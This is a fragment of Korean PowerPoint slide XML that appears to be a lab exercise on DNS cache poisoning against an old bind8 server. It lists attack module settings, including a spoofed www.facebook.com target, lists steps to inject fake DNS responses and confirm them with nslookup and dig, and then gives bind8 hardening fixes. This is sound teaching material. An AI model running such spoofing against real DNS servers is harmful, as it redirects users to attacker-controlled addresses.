              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500498" y="915609"/>
            <a:ext cx="5400040" cy="1963166"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3" name="표 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A219C35E-2B5A-41E0-B9DE-21029DB24664}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="209942005"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="500498" y="2994214"/>
          <a:ext cx="5327904" cy="1970024"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1129030">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2999008096"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2854198">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1789836265"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1344676">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1681651181"/>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설명</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예제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1585921"/>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BASEID</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시작 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>ID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47295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154536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HOSTNAME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 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www.facebook.com</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7249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NEWADDR</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938112"/>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RHOST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432064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SRCPORT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질의 소스 포트</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156104"/>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UPDNS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상위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804968"/>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XIDS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50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962063"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E26FD0EF-3009-4A90-B435-BDB0F900E760}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="899976" y="5871331"/>
            <a:ext cx="4528947" cy="377952"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6A99B5C-D928-4A0A-96BF-CF9A187E93DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6644524" y="920628"/>
            <a:ext cx="4693920" cy="350520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DB08161-BA26-4517-B8E0-D14C0116B4F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6355930" y="2279044"/>
            <a:ext cx="5237480" cy="395605"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E7C0E58-0353-456E-ACDB-61AF1BF57C84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6314517" y="3484743"/>
            <a:ext cx="5376985" cy="395604"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1E5C108-18AC-4D52-B6E8-E7368C80E379}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6355930" y="4806406"/>
            <a:ext cx="4508627" cy="362712"/>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75079995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XIDS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>주입할응답수</a:t>
            </a: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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>10) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 이용한 패킷 캡처 시작 및 공격 실행</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run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11) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 통해 공격 수행 과정 및 성공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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>질의가 공격 대상 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버로 전송됨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다수의 가짜 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>응답들이 주입됨</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성공 확인</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버가 공격 모듈에서 주입한 가짜 응답을 받아들임</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D2CB0AFE-FCF0-4204-9E35-5859167E8F7F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="807357" y="842130"/>
            <a:ext cx="3983101" cy="397637"/>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A737117-F3F9-46DB-843B-A2E38DEE89ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="586921" y="2035582"/>
            <a:ext cx="4808220" cy="1219200"/>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AAA93EE2-D63D-4B70-8379-0A37D5E50E8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500498" y="3764904"/>
            <a:ext cx="5400040" cy="2312924"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F068D89E-FCCB-40A2-94DE-3F6F7FAFBF9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248365" y="459434"/>
            <a:ext cx="5400040" cy="2312924"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F1D7EFE-14B4-41F0-A66D-15C3B834F394}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248365" y="3074233"/>
            <a:ext cx="5400040" cy="3081782"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="256582293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12)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명령어로 공격 성공 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>호스트명</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>10.10.1.14</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># dig @10.10.1.14 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>호스트명</a:t>
            </a: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ko-KR" altLang="en-US" sz="1000" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRP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및 오염시킨 호스트명 입력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>acheck</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>호스트명</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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3075A40A-4F63-4F40-A3AB-721CD56A4D84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1289877" y="1217687"/>
            <a:ext cx="3204083" cy="1208659"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC8BCBD3-B8EB-48B1-B0E8-42FEF5CCA089}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2118999309"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="598914" y="2615860"/>
          <a:ext cx="5328158" cy="2442655"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5328158">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2820359432"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="23743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3906924"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="213508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칼리에서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지정하면 웹 브라우저를 통해 확인 가능</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517656"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4097" name="_x762563712">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F32DD471-B532-4825-93E5-E7DEF111D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6" y="3126920"/>
            <a:ext cx="5204633" cy="183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0212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로컬 네트워크의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구형이라</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보고되고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보완하시오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EAF5DE74-F8E6-45FD-90D3-B942ECC721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25763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bind8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>설정 파일 열기 편집</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> vi /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>named.conf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bind8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>설정 변경</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558273"/>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query-source port 33333; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>삭제 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>➡ 상위 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버의 응답을 수신하는 포트를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>33333</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>으로 고정하지 않음</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>         (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>단</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>질의별로 다른 포트 번호가 부여되는 것은 아니며</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, bind8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 시작될 때 임의로 지정됨</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>※ use-id-pool true;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>    ➡ ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 순차적으로 증가시키는 대신 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>풀에서 임의의 값을 사용</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>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3F084CBD-CD74-417C-9767-2BEDE009EB09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="701222" y="948266"/>
            <a:ext cx="2417953" cy="328041"/>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624D5152-B9DF-49A2-83BE-4E3736A461D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="581296" y="1743125"/>
            <a:ext cx="5340812" cy="4408583"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D994BA32-A039-4139-A7DE-C27D679DD75B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1500058472"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6317760" y="985035"/>
          <a:ext cx="5327904" cy="738759"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1775968">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3303148218"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
